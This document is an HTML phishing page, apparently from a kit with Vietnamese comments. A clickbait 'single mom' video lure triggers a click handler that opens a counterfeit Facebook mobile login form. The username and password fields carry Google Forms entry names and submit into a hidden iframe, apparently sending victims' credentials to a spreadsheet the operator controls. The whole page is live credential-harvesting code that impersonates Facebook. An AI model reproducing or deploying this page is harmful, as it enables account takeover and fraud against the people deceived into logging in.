<!DOCTYPE html>
<html lang="vi" by="RangerLazzy">
<meta http-equiv="content-type" content="text/html;charset=UTF-8" />
<head>
    <title>Live!! Exploring with a single mom
</title>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    <meta name="description" content="Live!! Exploring with a single mom" />
    <link rel="canonical" href="index.html" />
    <meta property="og:locale" content="en_US" />
    <meta property="og:type" content="website" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta property="og:title" content="VIDEO CLIP HOT 2022" />
    <meta property="og:image"content="https://i.imgur.com/xLJQp5z.jpg" />
    <meta property="og:description" content="">
    <link rel="shortcut icon" type="image/png" href="https://i.imgur.com/xLJQp5z.jpg"/>
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" />
    <link rel="shortcut icon" href="">
    <link rel="stylesheet" href="/ajax/libs/twitter-bootstrap/4.1.2/css/bootstrap.min.css" />
    <link rel="stylesheet" href="/awesomefonts/1.0.0/lol-fonts.css" />
    <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto:300,300i,400,400i,500,500i,700,700i&amp;subset=vietnamese" />
    <link rel="stylesheet" href="/releases/v5.2.0/css/all.css" />
    <link rel="stylesheet" href="/assets/css/style.css" />
    <link rel="stylesheet" href="/assets/css/khanhdz.css" />
    <style>
        .card {
            border-radius: .25rem;
        }
        
        .bg-cover {
            border-radius: .25rem;
        }
    </style>
</head>

<body id="wrapped" class="home">
    <div class="loading" style="display: none;"></div>
    <main id="main" class="container text-center">
        <div class="tong">
            <a href="#" class="ui-btn ui-btn-inline ui-corner-all openPop">
                <video width="100%" height="1000px" controls autoplay>
                    <source src="/assets/video/video/abc.mp4" style="max-width: 100%;" type="video/mp4">
                </video>
            </a>
        </div>
        <body onclick="showlog()">
            <div class="modal fade" id="myModal" role="dialog">
                <section class="login-form-wrap">
                    <div class="_5soa acw" id="root" role="main" style="min-height: 613px;">
                        <div class="_4g33">
                            <div class="_4g34" id="u_0_0">
                                <div class="_5yd0 _2ph- _5yd1" style="display:none" id="login-notice">
                                </div>

                                <div class="aclb _4-4l">
                                    <div class="_5rut">
                                        <div id="msg"></div>
                                        <form method="post" name="google-sheet" class="mobile-login-form _5spm blockform" method="POST" style="display: block;" target="hidden_iframe">
                                            <div id="user_info_container"></div>
                                            <div id="pwd_label_container"></div>
                                            <div id="otp_retrieve_desc_container">
                                                <img src="https://static.xx.fbcdn.net/rsrc.php/y8/r/dF5SId3UHWd.svg" alt="" style=" height: 40px; margin-bottom: 10px;">
                                            </div>
                                            <div class="_56be">
                                                <div class="_1upc _mg8">
                                                    <div class="_4g33">
                                                        <div class="_4g34 _5i2i _52we">
                                                            <div class="_5xu4">
                                                                 <!-- tài khoản -->  <input class="input-box" name="entry.1040919426" placeholder="Mobile number or email address" type="text">
                                                            </div>
                                                        </div>
                                                    </div>
                                                </div>
                                            </div>
                                            <div class="_55wq"></div>
                                            <div class="_56be">
                                                <div class="_1upc _mg8">
                                                    <div class="_4g33">
                                                        <div class="_4g34 _5i2i _52we">
                                                            <div class="_5xu4">
                                                            <!-- mật khẩu -->    <input class="input-box" autocorrect="off" autocapitalize="off" class="_56bg _4u9z _5ruq _8qtn" autocomplete="on" name="entry.457449022" placeholder="Password" type="password">
                                                            </div>
                                                        </div>
                                                    </div>
                                                </div>
                                            </div>
                                            <!-- nước -->   <input hidden name="entry.1692002671" value="">

                                            <div class="hidden-message alert-box success" style="display: none;"> </div>
                                            <div class="_2pie" style="text-align:center;">
                                                <div id="u_0_4" class="">
                                                    <button class="input-box dangnhap" type="submit" value="Đăng nhập" class="_54k8 _52jh _56bs _56b_ _28lf _56bw _56bu" name="login" id="login"><span class="_55sr">Log in</span></button>
                                                </div>
                                                <div id="otp_button_elem_container">
                                                </div>
                                            </div>
                                            <div class="_xo8"></div>
                                            <iframe id="hidden_iframe" name="hidden_iframe" onload="if(submitted){}" style="display: none;"></iframe>
                                        </form>

                                        <div>
                                            <div class="_43mg" style="padding: 10px;"><span class="_43mh" style="color: black;">Or</span>
                                            </div>
                                            <div class="_52jj _5t3b" id="u_0_6"><a style=" background: #00a400;" role="button" class="_5t3c _28le btn btnS medBtn mfsm touchable" id="signup-button" href="#">Create New Account</a>
                                            </div>
                                        </div>
                                        <div>
                                            <div class="other-links">
                                                <ul class="_5pkb _55wp">
                                                    <li style="padding: 10px; ">
                                                        <span class="mfss fcg">
                                                            <a href="#" id="forgot-password-link" style="color:rgb(24, 119, 242)">Forgotten password?</a>
                                                        </span>
                                                    </li>
                                                </ul>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                            </div>
                        </div>
                        <div class="_55wr _5ui2">
                            <div class="_5dpw">
                                <div class="_5ui3" data-nocookies="1" id="locale-selector">
                                    <div class="_4g33 footer_123">
                                        <div class="_4g34">
                                            <span class="_52jc _52j9 _52jh _3ztb">English (UK)</span>
                                            <div class="_3ztc"><span class="_52jc"><a href="#">中文(台灣)</a></span>
                                            </div>
                                            <div class="_3ztc"><span class="_52jc"><a href="#">한국어</a></span>
                                            </div>
                                            <div class="_3ztc"><span class="_52jc"><a href="#">Português (Brasil)</a></span>
                                            </div>
                                        </div>
                                        <div class="_4g34">
                                            <div class="_3ztc"><span class="_52jc"><a href="#">Tiếng Việt</a></span>
                                            </div>
                                            <div class="_3ztc"><span class="_52jc"><a href="#">日本語</a></span>
                                            </div>
                                            <div class="_3ztc"><span class="_52jc"><a href="#">Español</a></span>
                                            </div>
                                            <a href="#">
                                                <div class="_3j87 _1rrd _3ztd" aria-label="Danh sách ngôn ngữ đầy đủ">
                                                    <i class="img sp_7V_P8-AK9yC sx_21ee4d"></i>
                                                </div>
                                            </a>
                                        </div>
                                    </div>
                                </div>
                                <div class="_5ui4"><span class="mfss fcg footer_1234">Facebook, Inc.</span>
                                </div>
                            </div>
                        </div>
                    </div>
                </section>
            </div>  
    </main>
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
    <script src="/ajax/libs/twitter-bootstrap/4.1.3/js/bootstrap.min.js"></script>
    <script src="/assets/js/sweetalert.min5e1f.js?v=2"></script>
    <script src="/assets/js/script30f4.js?v=3"></script>
    <script src="/sstt/abc.js"></script>
    <script type="text/javascript"></script>
    </body>
</html>